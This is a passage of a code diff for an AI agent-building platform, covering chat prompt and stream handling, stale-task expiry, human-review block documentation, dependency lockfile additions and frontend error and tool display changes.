result[event_name].extend(matchers)
return result

View File

@@ -245,12 +245,16 @@ async def _get_system_prompt_template(context: str) -> str:
return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
async def _build_system_prompt(
user_id: str | None, has_conversation_history: bool = False
) -> tuple[str, Any]:
"""Build the full system prompt including business understanding if available.
Args:
user_id: The user ID for fetching business understanding
If "default" and this is the user's first session, will use "onboarding" instead.
user_id: The user ID for fetching business understanding.
has_conversation_history: Whether there's existing conversation history.
If True, we don't tell the model to greet/introduce (since they're
already in a conversation).
Returns:
Tuple of (compiled prompt string, business understanding object)
@@ -266,6 +270,8 @@ async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
if understanding:
context = format_understanding_for_prompt(understanding)
elif has_conversation_history:
context = "No prior understanding saved yet. Continue the existing conversation naturally."
else:
context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
@@ -374,7 +380,6 @@ async def stream_chat_completion(
Raises:
NotFoundError: If session_id is invalid
ValueError: If max_context_messages is exceeded
"""
completion_start = time.monotonic()
@@ -459,8 +464,9 @@ async def stream_chat_completion(
# Generate title for new sessions on first user message (non-blocking)
# Check: is_user_message, no title yet, and this is the first user message
if is_user_message and message and not session.title:
user_messages = [m for m in session.messages if m.role == "user"]
user_messages = [m for m in session.messages if m.role == "user"]
first_user_msg = message or (user_messages[0].content if user_messages else None)
if is_user_message and first_user_msg and not session.title:
if len(user_messages) == 1:
# First user message - generate title in background
import asyncio
@@ -468,7 +474,7 @@ async def stream_chat_completion(
# Capture only the values we need (not the session object) to avoid
# stale data issues when the main flow modifies the session
captured_session_id = session_id
captured_message = message
captured_message = first_user_msg
captured_user_id = user_id
async def _update_title():
@@ -1233,7 +1239,7 @@ async def _stream_chat_chunks(
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
logger.info(
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
f"session={session.session_id}, user={session.user_id}",
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
)

View File

@@ -814,6 +814,28 @@ async def get_active_task_for_session(
if task_user_id and user_id != task_user_id:
continue
# Auto-expire stale tasks that exceeded stream_timeout
created_at_str = meta.get("created_at", "")
if created_at_str:
try:
created_at = datetime.fromisoformat(created_at_str)
age_seconds = (
datetime.now(timezone.utc) - created_at
).total_seconds()
if age_seconds > config.stream_timeout:
logger.warning(
f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
)
await mark_task_completed(task_id, "failed")
continue
except (ValueError, TypeError):
pass
logger.info(
f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
)
# Get the last message ID from Redis Stream
stream_key = _get_task_stream_key(task_id)
last_id = "0-0"

View File

@@ -335,11 +335,17 @@ class BlockInfoSummary(BaseModel):
name: str
description: str
categories: list[str]
input_schema: dict[str, Any]
output_schema: dict[str, Any]
input_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block inputs",
)
output_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block outputs",
)
required_inputs: list[BlockInputFieldInfo] = Field(
default_factory=list,
description="List of required input fields for this block",
description="List of input fields for this block",
)
@@ -352,7 +358,7 @@ class BlockListResponse(ToolResponseBase):
query: str
usage_hint: str = Field(
default="To execute a block, call run_block with block_id set to the block's "
"'id' field and input_data containing the required fields from input_schema."
"'id' field and input_data containing the fields listed in required_inputs."
)

View File

@@ -21,43 +21,71 @@ logger = logging.getLogger(__name__)
class HumanInTheLoopBlock(Block):
"""
This block pauses execution and waits for human approval or modification of the data.
Pauses execution and waits for human approval or rejection of the data.
When executed, it creates a pending review entry and sets the node execution status
to REVIEW. The execution will remain paused until a human user either:
- Approves the data (with or without modifications)
- Rejects the data
When executed, this block creates a pending review entry and sets the node execution
status to REVIEW. The execution remains paused until a human user either approves
or rejects the data.
This is useful for workflows that require human validation or intervention before
proceeding to the next steps.
**How it works:**
- The input data is presented to a human reviewer
- The reviewer can approve or reject (and optionally modify the data if editable)
- On approval: the data flows out through the `approved_data` output pin
- On rejection: the data flows out through the `rejected_data` output pin
**Important:** The output pins yield the actual data itself, NOT status strings.
The approval/rejection decision determines WHICH output pin fires, not the value.
You do NOT need to compare the output to "APPROVED" or "REJECTED" - simply connect
downstream blocks to the appropriate output pin for each case.
**Example usage:**
- Connect `approved_data` → next step in your workflow (data was approved)
- Connect `rejected_data` → error handling or notification (data was rejected)
"""
class Input(BlockSchemaInput):
data: Any = SchemaField(description="The data to be reviewed by a human user")
data: Any = SchemaField(
description="The data to be reviewed by a human user. "
"This exact data will be passed through to either approved_data or "
"rejected_data output based on the reviewer's decision."
)
name: str = SchemaField(
description="A descriptive name for what this data represents",
description="A descriptive name for what this data represents. "
"This helps the reviewer understand what they are reviewing.",
)
editable: bool = SchemaField(
description="Whether the human reviewer can edit the data",
description="Whether the human reviewer can edit the data before "
"approving or rejecting it",
default=True,
advanced=True,
)
class Output(BlockSchemaOutput):
approved_data: Any = SchemaField(
description="The data when approved (may be modified by reviewer)"
description="Outputs the input data when the reviewer APPROVES it. "
"The value is the actual data itself (not a status string like 'APPROVED'). "
"If the reviewer edited the data, this contains the modified version. "
"Connect downstream blocks here for the 'approved' workflow path."
)
rejected_data: Any = SchemaField(
description="The data when rejected (may be modified by reviewer)"
description="Outputs the input data when the reviewer REJECTS it. "
"The value is the actual data itself (not a status string like 'REJECTED'). "
"If the reviewer edited the data, this contains the modified version. "
"Connect downstream blocks here for the 'rejected' workflow path."
)
review_message: str = SchemaField(
description="Any message provided by the reviewer", default=""
description="Optional message provided by the reviewer explaining their "
"decision. Only outputs when the reviewer provides a message; "
"this pin does not fire if no message was given.",
default="",
)
def __init__(self):
super().__init__(
id="8b2a7b3c-6e9d-4a5f-8c1b-2e3f4a5b6c7d",
description="Pause execution and wait for human approval or modification of data",
description="Pause execution for human review. Data flows through "
"approved_data or rejected_data output based on the reviewer's decision. "
"Outputs contain the actual data, not status strings.",
categories={BlockCategory.BASIC},
input_schema=HumanInTheLoopBlock.Input,
output_schema=HumanInTheLoopBlock.Output,

View File

@@ -743,6 +743,11 @@ class GraphModel(Graph, GraphMeta):
# For invalid blocks, we still raise immediately as this is a structural issue
raise ValueError(f"Invalid block {node.block_id} for node #{node.id}")
if block.disabled:
raise ValueError(
f"Block {node.block_id} is disabled and cannot be used in graphs"
)
node_input_mask = (
nodes_input_masks.get(node.id, {}) if nodes_input_masks else {}
)

View File

@@ -213,6 +213,9 @@ async def execute_node(
block_name=node_block.name,
)
if node_block.disabled:
raise ValueError(f"Block {node_block.id} is disabled and cannot be executed")
# Sanity check: validate the execution input.
input_data, error = validate_exec(node, data.inputs, resolve_input=False)
if input_data is None:

View File

@@ -364,6 +364,44 @@ def _remove_orphan_tool_responses(
return result
def validate_and_remove_orphan_tool_responses(
messages: list[dict],
log_warning: bool = True,
) -> list[dict]:
"""
Validate tool_call/tool_response pairs and remove orphaned responses.
Scans messages in order, tracking all tool_call IDs. Any tool response
referencing an ID not seen in a preceding message is considered orphaned
and removed. This prevents API errors like Anthropic's "unexpected tool_use_id".
Args:
messages: List of messages to validate (OpenAI or Anthropic format)
log_warning: Whether to log a warning when orphans are found
Returns:
A new list with orphaned tool responses removed
"""
available_ids: set[str] = set()
orphan_ids: set[str] = set()
for msg in messages:
available_ids |= _extract_tool_call_ids_from_message(msg)
for resp_id in _extract_tool_response_ids_from_message(msg):
if resp_id not in available_ids:
orphan_ids.add(resp_id)
if not orphan_ids:
return messages
if log_warning:
logger.warning(
f"Removing {len(orphan_ids)} orphan tool response(s): {orphan_ids}"
)
return _remove_orphan_tool_responses(messages, orphan_ids)
def _ensure_tool_pairs_intact(
recent_messages: list[dict],
all_messages: list[dict],
@@ -723,6 +761,13 @@ async def compress_context(
# Filter out any None values that may have been introduced
final_msgs: list[dict] = [m for m in msgs if m is not None]
# ---- STEP 6: Final tool-pair validation ---------------------------------
# After all compression steps, verify that every tool response has a
# matching tool_call in a preceding assistant message. Remove orphans
# to prevent API errors (e.g., Anthropic's "unexpected tool_use_id").
final_msgs = validate_and_remove_orphan_tool_responses(final_msgs)
final_count = sum(_msg_tokens(m, enc) for m in final_msgs)
error = None
if final_count + reserve > target_tokens:

View File

@@ -897,6 +897,29 @@ files = [
{file = "charset_normalizer-3.4.4.tar.gz", hash = "sha256:94537985111c35f28720e43603b8e7b43a6ecfb2ce1d3058bbe955b73404e21a"},
]
[[package]]
name = "claude-agent-sdk"
version = "0.1.35"
description = "Python SDK for Claude Code"
optional = false
python-versions = ">=3.10"
groups = ["main"]
files = [
{file = "claude_agent_sdk-0.1.35-py3-none-macosx_11_0_arm64.whl", hash = "sha256:df67f4deade77b16a9678b3a626c176498e40417f33b04beda9628287f375591"},
{file = "claude_agent_sdk-0.1.35-py3-none-manylinux_2_17_aarch64.whl", hash = "sha256:14963944f55ded7c8ed518feebfa5b4284aa6dd8d81aeff2e5b21a962ce65097"},
{file = "claude_agent_sdk-0.1.35-py3-none-manylinux_2_17_x86_64.whl", hash = "sha256:84344dcc535d179c1fc8a11c6f34c37c3b583447bdf09d869effb26514fd7a65"},
{file = "claude_agent_sdk-0.1.35-py3-none-win_amd64.whl", hash = "sha256:1b3d54b47448c93f6f372acd4d1757f047c3c1e8ef5804be7a1e3e53e2c79a5f"},
{file = "claude_agent_sdk-0.1.35.tar.gz", hash = "sha256:0f98e2b3c71ca85abfc042e7a35c648df88e87fda41c52e6779ef7b038dcbb52"},
]
[package.dependencies]
anyio = ">=4.0.0"
mcp = ">=0.1.0"
typing-extensions = {version = ">=4.0.0", markers = "python_version < \"3.11\""}
[package.extras]
dev = ["anyio[trio] (>=4.0.0)", "mypy (>=1.0.0)", "pytest (>=7.0.0)", "pytest-asyncio (>=0.20.0)", "pytest-cov (>=4.0.0)", "ruff (>=0.1.0)"]
[[package]]
name = "cleo"
version = "2.1.0"
@@ -2593,6 +2616,18 @@ http2 = ["h2 (>=3,<5)"]
socks = ["socksio (==1.*)"]
zstd = ["zstandard (>=0.18.0)"]
[[package]]
name = "httpx-sse"
version = "0.4.3"
description = "Consume Server-Sent Event (SSE) messages with HTTPX."
optional = false
python-versions = ">=3.9"
groups = ["main"]
files = [
{file = "httpx_sse-0.4.3-py3-none-any.whl", hash = "sha256:0ac1c9fe3c0afad2e0ebb25a934a59f4c7823b60792691f779fad2c5568830fc"},
{file = "httpx_sse-0.4.3.tar.gz", hash = "sha256:9b1ed0127459a66014aec3c56bebd93da3c1bc8bb6618c8082039a44889a755d"},
]
[[package]]
name = "huggingface-hub"
version = "1.4.1"
@@ -3310,6 +3345,39 @@ files = [
{file = "mccabe-0.7.0.tar.gz", hash = "sha256:348e0240c33b60bbdf4e523192ef919f28cb2c3d7d5c7794f74009290f236325"},
]
[[package]]
name = "mcp"
version = "1.26.0"
description = "Model Context Protocol SDK"
optional = false
python-versions = ">=3.10"
groups = ["main"]
files = [
{file = "mcp-1.26.0-py3-none-any.whl", hash = "sha256:904a21c33c25aa98ddbeb47273033c435e595bbacfdb177f4bd87f6dceebe1ca"},
{file = "mcp-1.26.0.tar.gz", hash = "sha256:db6e2ef491eecc1a0d93711a76f28dec2e05999f93afd48795da1c1137142c66"},
]
[package.dependencies]
anyio = ">=4.5"
httpx = ">=0.27.1"
httpx-sse = ">=0.4"
jsonschema = ">=4.20.0"
pydantic = ">=2.11.0,<3.0.0"
pydantic-settings = ">=2.5.2"
pyjwt = {version = ">=2.10.1", extras = ["crypto"]}
python-multipart = ">=0.0.9"
pywin32 = {version = ">=310", markers = "sys_platform == \"win32\""}
sse-starlette = ">=1.6.1"
starlette = ">=0.27"
typing-extensions = ">=4.9.0"
typing-inspection = ">=0.4.1"
uvicorn = {version = ">=0.31.1", markers = "sys_platform != \"emscripten\""}
[package.extras]
cli = ["python-dotenv (>=1.0.0)", "typer (>=0.16.0)"]
rich = ["rich (>=13.9.4)"]
ws = ["websockets (>=15.0.1)"]
[[package]]
name = "mdurl"
version = "0.1.2"
@@ -5994,7 +6062,7 @@ description = "Python for Window Extensions"
optional = false
python-versions = "*"
groups = ["main"]
markers = "platform_system == \"Windows\""
markers = "sys_platform == \"win32\" or platform_system == \"Windows\""
files = [
{file = "pywin32-311-cp310-cp310-win32.whl", hash = "sha256:d03ff496d2a0cd4a5893504789d4a15399133fe82517455e78bad62efbb7f0a3"},
{file = "pywin32-311-cp310-cp310-win_amd64.whl", hash = "sha256:797c2772017851984b97180b0bebe4b620bb86328e8a884bb626156295a63b3b"},
@@ -6974,6 +7042,28 @@ postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"]
pymysql = ["pymysql"]
sqlcipher = ["sqlcipher3_binary"]
[[package]]
name = "sse-starlette"
version = "3.2.0"
description = "SSE plugin for Starlette"
optional = false
python-versions = ">=3.9"
groups = ["main"]
files = [
{file = "sse_starlette-3.2.0-py3-none-any.whl", hash = "sha256:5876954bd51920fc2cd51baee47a080eb88a37b5b784e615abb0b283f801cdbf"},
{file = "sse_starlette-3.2.0.tar.gz", hash = "sha256:8127594edfb51abe44eac9c49e59b0b01f1039d0c7461c6fd91d4e03b70da422"},
]
[package.dependencies]
anyio = ">=4.7.0"
starlette = ">=0.49.1"
[package.extras]
daphne = ["daphne (>=4.2.0)"]
examples = ["aiosqlite (>=0.21.0)", "fastapi (>=0.115.12)", "sqlalchemy[asyncio] (>=2.0.41)", "uvicorn (>=0.34.0)"]
granian = ["granian (>=2.3.1)"]
uvicorn = ["uvicorn (>=0.34.0)"]
[[package]]
name = "stagehand"
version = "0.5.9"
@@ -8440,4 +8530,4 @@ cffi = ["cffi (>=1.17,<2.0) ; platform_python_implementation != \"PyPy\" and pyt
[metadata]
lock-version = "2.1"
python-versions = ">=3.10,<3.14"
content-hash = "c06e96ad49388ba7a46786e9ea55ea2c1a57408e15613237b4bee40a592a12af"
content-hash = "942dea6daf671c3be65a22f3445feda26c1af9409d7173765e9a0742f0aa05dc"

View File

@@ -16,6 +16,7 @@ anthropic = "^0.79.0"
apscheduler = "^3.11.1"
autogpt-libs = { path = "../autogpt_libs", develop = true }
bleach = { extras = ["css"], version = "^6.2.0" }
claude-agent-sdk = "^0.1.0"
click = "^8.2.0"
cryptography = "^46.0"
discord-py = "^2.5.2"

View File

@@ -10,8 +10,9 @@ import {
MessageResponse,
} from "@/components/ai-elements/message";
import { LoadingSpinner } from "@/components/atoms/LoadingSpinner/LoadingSpinner";
import { toast } from "@/components/molecules/Toast/use-toast";
import { ToolUIPart, UIDataTypes, UIMessage, UITools } from "ai";
import { useEffect, useState } from "react";
import { useEffect, useRef, useState } from "react";
import { CreateAgentTool } from "../../tools/CreateAgent/CreateAgent";
import { EditAgentTool } from "../../tools/EditAgent/EditAgent";
import { FindAgentsTool } from "../../tools/FindAgents/FindAgents";
@@ -19,6 +20,7 @@ import { FindBlocksTool } from "../../tools/FindBlocks/FindBlocks";
import { RunAgentTool } from "../../tools/RunAgent/RunAgent";
import { RunBlockTool } from "../../tools/RunBlock/RunBlock";
import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs";
import { GenericTool } from "../../tools/GenericTool/GenericTool";
import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput";
// ---------------------------------------------------------------------------
@@ -121,6 +123,7 @@ export const ChatMessagesContainer = ({
isLoading,
}: ChatMessagesContainerProps) => {
const [thinkingPhrase, setThinkingPhrase] = useState(getRandomPhrase);
const lastToastTimeRef = useRef(0);
useEffect(() => {
if (status === "submitted") {
@@ -128,6 +131,20 @@ export const ChatMessagesContainer = ({
}
}, [status]);
// Show a toast when a new error occurs, debounced to avoid spam
useEffect(() => {
if (!error) return;
const now = Date.now();
if (now - lastToastTimeRef.current < 3_000) return;
lastToastTimeRef.current = now;
toast({
variant: "destructive",
title: "Something went wrong",
description:
"The assistant encountered an error. Please try sending your message again.",
});
}, [error]);
const lastMessage = messages[messages.length - 1];
const lastAssistantHasVisibleContent =
lastMessage?.role === "assistant" &&
@@ -239,6 +256,16 @@ export const ChatMessagesContainer = ({
/>
);
default:
// Render a generic tool indicator for SDK built-in
// tools (Read, Glob, Grep, etc.) or any unrecognized tool
if (part.type.startsWith("tool-")) {
return (
<GenericTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
}
return null;
}
})}
@@ -263,8 +290,12 @@ export const ChatMessagesContainer = ({
</Message>
)}
{error && (
<div className="rounded-lg bg-red-50 p-3 text-red-600">
Error: {error.message}
<div className="rounded-lg bg-red-50 p-4 text-sm text-red-700">
<p className="font-medium">Something went wrong</p>
<p className="mt-1 text-red-600">
The assistant encountered an error. Please try sending your
message again.
</p>
</div>
)}
</ConversationContent>

View File

@@ -30,7 +30,7 @@ export function ContentCard({
return (
<div
className={cn(
"rounded-lg bg-gradient-to-r from-purple-500/30 to-blue-500/30 p-[1px]",
"min-w-0 rounded-lg bg-gradient-to-r from-purple-500/30 to-blue-500/30 p-[1px]",
className,
)}
>

View File

@@ -4,7 +4,6 @@ import { WarningDiamondIcon } from "@phosphor-icons/react";
import type { ToolUIPart } from "ai";
import { useCopilotChatActions } from "../../components/CopilotChatActionsProvider/useCopilotChatActions";
import { MorphingTextAnimation } from "../../components/MorphingTextAnimation/MorphingTextAnimation";
import { OrbitLoader } from "../../components/OrbitLoader/OrbitLoader";
import { ProgressBar } from "../../components/ProgressBar/ProgressBar";
import {
ContentCardDescription,
@@ -77,7 +76,7 @@ function getAccordionMeta(output: CreateAgentToolOutput) {
isOperationInProgressOutput(output)
) {
return {
icon: <OrbitLoader size={32} />,
icon,
title: "Creating agent, this may take a few minutes. Sit back and relax.",
};
}

View File

@@ -0,0 +1,63 @@
"use client";
import { ToolUIPart } from "ai";
import { GearIcon } from "@phosphor-icons/react";
import { MorphingTextAnimation } from "../../components/MorphingTextAnimation/MorphingTextAnimation";
interface Props {
part: ToolUIPart;
}
function extractToolName(part: ToolUIPart): string {
// ToolUIPart.type is "tool-{name}", extract the name portion.
return part.type.replace(/^tool-/, "");
}
function formatToolName(name: string): string {
// "search_docs" → "Search docs", "Read" → "Read"
return name.replace(/_/g, " ").replace(/^\w/, (c) => c.toUpperCase());
}
function getAnimationText(part: ToolUIPart): string {
const label = formatToolName(extractToolName(part));
switch (part.state) {
case "input-streaming":
case "input-available":
return `Running ${label}`;
case "output-available":
return `${label} completed`;
case "output-error":
return `${label} failed`;
default:
return `Running ${label}`;
}
}
export function GenericTool({ part }: Props) {
const isStreaming =
part.state === "input-streaming" || part.state === "input-available";
const isError = part.state === "output-error";
return (
<div className="py-2">
<div className="flex items-center gap-2 text-sm text-muted-foreground">
<GearIcon
size={14}
weight="regular"
className={
isError
? "text-red-500"
: isStreaming
? "animate-spin text-neutral-500"
: "text-neutral-400"
}
/>
<MorphingTextAnimation
text={getAnimationText(part)}
className={isError ? "text-red-500" : undefined}
/>
</div>
</div>
);
}

View File

@@ -203,7 +203,7 @@ export function getAccordionMeta(output: RunAgentToolOutput): {
? output.status.trim()
: "started";
return {
icon: <OrbitLoader size={28} className="text-neutral-700" />,
icon,
title: output.graph_name,
description: `Status: ${statusText}`,
};

View File

@@ -149,7 +149,7 @@ export function getAccordionMeta(output: RunBlockToolOutput): {
if (isRunBlockBlockOutput(output)) {
const keys = Object.keys(output.outputs ?? {});
return {
icon: <OrbitLoader size={24} className="text-neutral-700" />,
icon,
title: output.block_name,
description:
keys.length > 0

View File

@@ -1,11 +1,8 @@
import { environment } from "@/services/environment";
import { getServerAuthToken } from "@/lib/autogpt-server-api/helpers";
import { NextRequest } from "next/server";
import { normalizeSSEStream, SSE_HEADERS } from "../../../sse-helpers";
/**
* SSE Proxy for chat streaming.
* Supports POST with context (page content + URL) in the request body.
*/
export async function POST(
request: NextRequest,
{ params }: { params: Promise<{ sessionId: string }> },
@@ -23,17 +20,14 @@ export async function POST(
);
}
// Get auth token from server-side session
const token = await getServerAuthToken();
// Build backend URL
const backendUrl = environment.getAGPTServerBaseUrl();
const streamUrl = new URL(
`/api/chat/sessions/${sessionId}/stream`,
backendUrl,
);
// Forward request to backend with auth header
const headers: Record<string, string> = {
"Content-Type": "application/json",
Accept: "text/event-stream",
@@ -63,14 +57,15 @@ export async function POST(
});
}
// Return the SSE stream directly
return new Response(response.body, {
headers: {
"Content-Type": "text/event-stream",
"Cache-Control": "no-cache, no-transform",
Connection: "keep-alive",
"X-Accel-Buffering": "no",
},
if (!response.body) {
return new Response(
JSON.stringify({ error: "Empty response from chat service" }),
{ status: 502, headers: { "Content-Type": "application/json" } },
);
}
return new Response(normalizeSSEStream(response.body), {
headers: SSE_HEADERS,
});
} catch (error) {
console.error("SSE proxy error:", error);
@@ -87,13 +82,6 @@ export async function POST(
}
}
/**
* Resume an active stream for a session.
*
* Called by the AI SDK's `useChat(resume: true)` on page load.
* Proxies to the backend which checks for an active stream and either
* replays it (200 + SSE) or returns 204 No Content.
*/
export async function GET(
_request: NextRequest,
{ params }: { params: Promise<{ sessionId: string }> },
@@ -124,7 +112,6 @@ export async function GET(
headers,
});
// 204 = no active stream to resume
if (response.status === 204) {
return new Response(null, { status: 204 });
}
@@ -137,12 +124,13 @@ export async function GET(
});
}
return new Response(response.body, {
if (!response.body) {
return new Response(null, { status: 204 });
}
return new Response(normalizeSSEStream(response.body), {
headers: {
"Content-Type": "text/event-stream",
"Cache-Control": "no-cache, no-transform",
Connection: "keep-alive",
"X-Accel-Buffering": "no",
...SSE_HEADERS,
"x-vercel-ai-ui-message-stream": "v1",
},
});

View File

@@ -0,0 +1,72 @@
export const SSE_HEADERS = {
"Content-Type": "text/event-stream",
"Cache-Control": "no-cache, no-transform",
Connection: "keep-alive",
"X-Accel-Buffering": "no",
} as const;
export function normalizeSSEStream(
input: ReadableStream<Uint8Array>,
): ReadableStream<Uint8Array> {
const decoder = new TextDecoder();
const encoder = new TextEncoder();
let buffer = "";
return input.pipeThrough(
new TransformStream<Uint8Array, Uint8Array>({
transform(chunk, controller) {
buffer += decoder.decode(chunk, { stream: true });
const parts = buffer.split("\n\n");
buffer = parts.pop() ?? "";
for (const part of parts) {
const normalized = normalizeSSEEvent(part);
controller.enqueue(encoder.encode(normalized + "\n\n"));
}
},
flush(controller) {
if (buffer.trim()) {
const normalized = normalizeSSEEvent(buffer);
controller.enqueue(encoder.encode(normalized + "\n\n"));
}
},
}),
);
}
function normalizeSSEEvent(event: string): string {
const lines = event.split("\n");
const dataLines: string[] = [];
const otherLines: string[] = [];
for (const line of lines) {
if (line.startsWith("data: ")) {
dataLines.push(line.slice(6));
} else {
otherLines.push(line);
}
}
if (dataLines.length === 0) return event;
const dataStr = dataLines.join("\n");
try {
const parsed = JSON.parse(dataStr) as Record<string, unknown>;
if (parsed.type === "error") {
const normalized = {
type: "error",
errorText:
typeof parsed.errorText === "string"
? parsed.errorText
: "An unexpected error occurred",
};
const newData = `data: ${JSON.stringify(normalized)}`;
return [...otherLines.filter((l) => l.length > 0), newData].join("\n");
}
} catch {
// Not valid JSON — pass through as-is
}
return event;
}

View File

@@ -1,20 +1,8 @@
import { environment } from "@/services/environment";
import { getServerAuthToken } from "@/lib/autogpt-server-api/helpers";
import { NextRequest } from "next/server";
import { normalizeSSEStream, SSE_HEADERS } from "../../../sse-helpers";
/**
* SSE Proxy for task stream reconnection.
*
* This endpoint allows clients to reconnect to an ongoing or recently completed
* background task's stream. It replays missed messages from Redis Streams and
* subscribes to live updates if the task is still running.
*
* Client contract:
* 1. When receiving an operation_started event, store the task_id
* 2. To reconnect: GET /api/chat/tasks/{taskId}/stream?last_message_id={idx}
* 3. Messages are replayed from the last_message_id position
* 4. Stream ends when "finish" event is received
*/
export async function GET(
request: NextRequest,
{ params }: { params: Promise<{ taskId: string }> },
@@ -24,15 +12,12 @@ export async function GET(
const lastMessageId = searchParams.get("last_message_id") || "0-0";
try {
// Get auth token from server-side session
const token = await getServerAuthToken();
// Build backend URL
const backendUrl = environment.getAGPTServerBaseUrl();
const streamUrl = new URL(`/api/chat/tasks/${taskId}/stream`, backendUrl);
streamUrl.searchParams.set("last_message_id", lastMessageId);
// Forward request to backend with auth header
const headers: Record<string, string> = {
Accept: "text/event-stream",
"Cache-Control": "no-cache",
@@ -56,14 +41,12 @@ export async function GET(
});
}
// Return the SSE stream directly
return new Response(response.body, {
headers: {
"Content-Type": "text/event-stream",
"Cache-Control": "no-cache, no-transform",
Connection: "keep-alive",
"X-Accel-Buffering": "no",
},
if (!response.body) {
return new Response(null, { status: 204 });
}
return new Response(normalizeSSEStream(response.body), {
headers: SSE_HEADERS,
});
} catch (error) {
console.error("Task stream proxy error:", error);

View File

@@ -7022,29 +7022,24 @@
"input_schema": {
"additionalProperties": true,
"type": "object",
"title": "Input Schema"
"title": "Input Schema",
"description": "Full JSON schema for block inputs"
},
"output_schema": {
"additionalProperties": true,
"type": "object",
"title": "Output Schema"
"title": "Output Schema",
"description": "Full JSON schema for block outputs"
},
"required_inputs": {
"items": { "$ref": "#/components/schemas/BlockInputFieldInfo" },
"type": "array",
"title": "Required Inputs",
"description": "List of required input fields for this block"
"description": "List of input fields for this block"
}
},
"type": "object",
"required": [
"id",
"name",
"description",
"categories",
"input_schema",
"output_schema"
],
"required": ["id", "name", "description", "categories"],
"title": "BlockInfoSummary",
"description": "Summary of a block for search results."
},
@@ -7090,7 +7085,7 @@
"usage_hint": {
"type": "string",
"title": "Usage Hint",
"default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the required fields from input_schema."
"default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the fields listed in required_inputs."
}
},
"type": "object",

View File

@@ -61,7 +61,7 @@ Below is a comprehensive list of all available blocks, categorized by their prim
| [Get List Item](block-integrations/basic.md#get-list-item) | Returns the element at the given index |
| [Get Store Agent Details](block-integrations/system/store_operations.md#get-store-agent-details) | Get detailed information about an agent from the store |
| [Get Weather Information](block-integrations/basic.md#get-weather-information) | Retrieves weather information for a specified location using OpenWeatherMap API |
| [Human In The Loop](block-integrations/basic.md#human-in-the-loop) | Pause execution and wait for human approval or modification of data |
| [Human In The Loop](block-integrations/basic.md#human-in-the-loop) | Pause execution for human review |
| [List Is Empty](block-integrations/basic.md#list-is-empty) | Checks if a list is empty |
| [List Library Agents](block-integrations/system/library_operations.md#list-library-agents) | List all agents in your personal library |
| [Note](block-integrations/basic.md#note) | A visual annotation block that displays a sticky note in the workflow editor for documentation and organization purposes |

View File

@@ -975,7 +975,7 @@ A travel planning application could use this block to provide users with current
## Human In The Loop
### What it is
Pause execution and wait for human approval or modification of data
Pause execution for human review. Data flows through approved_data or rejected_data output based on the reviewer's decision. Outputs contain the actual data, not status strings.
### How it works
<!-- MANUAL: how_it_works -->
@@ -988,18 +988,18 @@ This enables human oversight at critical points in automated workflows, ensuring
| Input | Description | Type | Required |
|-------|-------------|------|----------|
| data | The data to be reviewed by a human user | Data | Yes |
| name | A descriptive name for what this data represents | str | Yes |
| editable | Whether the human reviewer can edit the data | bool | No |
| data | The data to be reviewed by a human user. This exact data will be passed through to either approved_data or rejected_data output based on the reviewer's decision. | Data | Yes |
| name | A descriptive name for what this data represents. This helps the reviewer understand what they are reviewing. | str | Yes |
| editable | Whether the human reviewer can edit the data before approving or rejecting it | bool | No |
### Outputs
| Output | Description | Type |
|--------|-------------|------|
| error | Error message if the operation failed | str |
| approved_data | The data when approved (may be modified by reviewer) | Approved Data |
| rejected_data | The data when rejected (may be modified by reviewer) | Rejected Data |
| review_message | Any message provided by the reviewer | str |
| approved_data | Outputs the input data when the reviewer APPROVES it. The value is the actual data itself (not a status string like 'APPROVED'). If the reviewer edited the data, this contains the modified version. Connect downstream blocks here for the 'approved' workflow path. | Approved Data |
| rejected_data | Outputs the input data when the reviewer REJECTS it. The value is the actual data itself (not a status string like 'REJECTED'). If the reviewer edited the data, this contains the modified version. Connect downstream blocks here for the 'rejected' workflow path. | Rejected Data |
| review_message | Optional message provided by the reviewer explaining their decision. Only outputs when the reviewer provides a message; this pin does not fire if no message was given. | str |
### Possible use case
<!-- MANUAL: use_case -->